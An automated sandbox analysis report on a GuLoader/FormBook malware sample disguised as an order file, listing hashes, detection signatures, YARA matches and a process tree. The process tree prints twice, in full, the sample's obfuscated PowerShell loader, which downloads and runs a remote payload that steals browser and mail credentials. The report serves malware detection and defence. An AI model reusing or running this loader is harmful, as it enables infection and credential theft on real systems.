Windows Analysis Report
Narudzba ACH0036173.vbe

Overview

General Information

Sample name: Narudzba ACH0036173.vbe
Analysis ID: 1526385
MD5: 824bafbe5495192cebc5804b329f3094
SHA1: 2b0bdbb8bdd2b2a1c85f18830c52c221f83a2948
SHA256: dea03e99875a3cac75ed89dcc01f854f085ff13a9dfb406e25955e36668fde47
Tags: vbe, user-abuse_ch

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6572 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2504 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3864 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 1068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. 
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh 
EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl 
NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. 
Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5812 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. 
betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh 
EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl 
NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. 
Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1852 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • HTiDHBMqChwMbO.exe (PID: 1436 cmdline: "C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 2380 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
          • HTiDHBMqChwMbO.exe (PID: 1696 cmdline: "C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6892 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_1068.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_5812.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
  • 0xd0d1:$b2: ::FromBase64String(
  • 0xc141:$s1: -join
  • 0x58ed:$s4: +=
  • 0x59af:$s4: +=
  • 0x9bd6:$s4: +=
  • 0xbcf3:$s4: +=
  • 0xbfdd:$s4: +=
  • 0xc123:$s4: +=
